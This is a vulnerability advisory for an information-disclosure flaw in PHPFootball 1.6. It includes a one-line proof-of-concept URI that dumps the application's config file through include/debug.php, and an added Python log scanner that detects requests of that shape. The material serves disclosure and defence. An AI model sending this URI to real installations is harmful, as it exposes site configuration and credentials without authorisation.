PHPFootball Show.PHP Information Disclosure Vulnerability
BID:22312
Info
| Bugtraq ID: | 22312 |
| Class: | Input Validation Error |
| CVE: | CVE-2007-0638 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 30 2007 12:00AM |
| Updated: | May 12 2015 07:34PM |
| Credit: | ajann is credited with the discovery of this vulnerability. |
| Vulnerable: | PHPFootball PHPFootball 1.6 |
| Not Vulnerable: | |
Discussion
PHPFootball is prone to an information-disclosure vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to view any database information that the application has read access to. Information obtained may aid in further attacks.
Version 1.6 is vulnerable; other versions may also be affected.
Exploit / POC
Attackers can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.example.com/include/debug.php?config[debug]=10&conffile=config.php
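A defender-side check for the request shape in the proof-of-concept URI above, as an added example that is not part of the original advisory: it scans web-server access logs for requests to include/debug.php that carry the config[...] and conffile parameters, including the percent-encoded bracket form. The combined log format, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in combined log format (documentation addresses, not real traffic).
SAMPLE_LOG = '''\
203.0.113.5 - - [30/Jan/2007:10:00:00 +0000] "GET /include/debug.php?config[debug]=10&conffile=config.php HTTP/1.1" 200 4096 "-" "-"
203.0.113.5 - - [30/Jan/2007:10:00:02 +0000] "GET /include/debug.php?config%5Bdebug%5D=10&conffile=config.php HTTP/1.1" 200 4096 "-" "-"
198.51.100.7 - - [30/Jan/2007:10:01:00 +0000] "GET /show.php?id=3 HTTP/1.1" 200 812 "-" "-"
198.51.100.7 - - [30/Jan/2007:10:02:00 +0000] "GET /football/INCLUDE/Debug.php?conffile=config.php HTTP/1.1" 404 210 "-" "-"
'''

# client address, request target and status code from one access-log line
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3}) ')


def classify(line):
    """Return a finding dict for a request to include/debug.php, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target, status = m.group(1), m.group(2), int(m.group(3))
    url = urlsplit(target)
    # Case-insensitive match: the script may sit on a case-insensitive filesystem.
    if not url.path.lower().endswith("/include/debug.php"):
        return None
    # parse_qsl percent-decodes names, so config%5Bdebug%5D becomes config[debug].
    names = {k.lower() for k, _ in parse_qsl(url.query, keep_blank_values=True)}
    seen = sorted(n for n in names if n.startswith("config[") or n == "conffile")
    both = "conffile" in names and any(n.startswith("config[") for n in names)
    return {
        "client": client,
        "params": seen,
        # "poc-match": both parameters from the advisory's URI; "probe": the script only.
        "level": "poc-match" if both else "probe",
        # A 200 response means the script was reachable and answered the request.
        "served": status == 200,
    }


def scan(log_text):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Parameters sent in a POST body do not appear in access logs, so a "probe" finding on a POST request deserves the same follow-up as a "poc-match".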
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].